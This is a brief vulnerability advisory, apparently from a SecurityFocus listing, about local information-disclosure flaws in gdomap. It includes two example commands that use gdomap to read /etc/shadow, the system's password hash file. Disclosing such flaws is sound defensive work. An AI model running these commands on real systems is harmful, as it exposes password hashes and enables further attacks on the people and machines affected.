|   1 2 3 4 5 6 7 8 9 10 11  |  source: https://www.securityfocus.com/bid/40005/info gdomap is prone to multiple local information-disclosure vulnerabilities. Local attackers can exploit these issues to obtain sensitive information that may lead to further attacks.  The following example commands are available: $ gdomap -c /etc/shadow $ gdomap -a /etc/shadow   |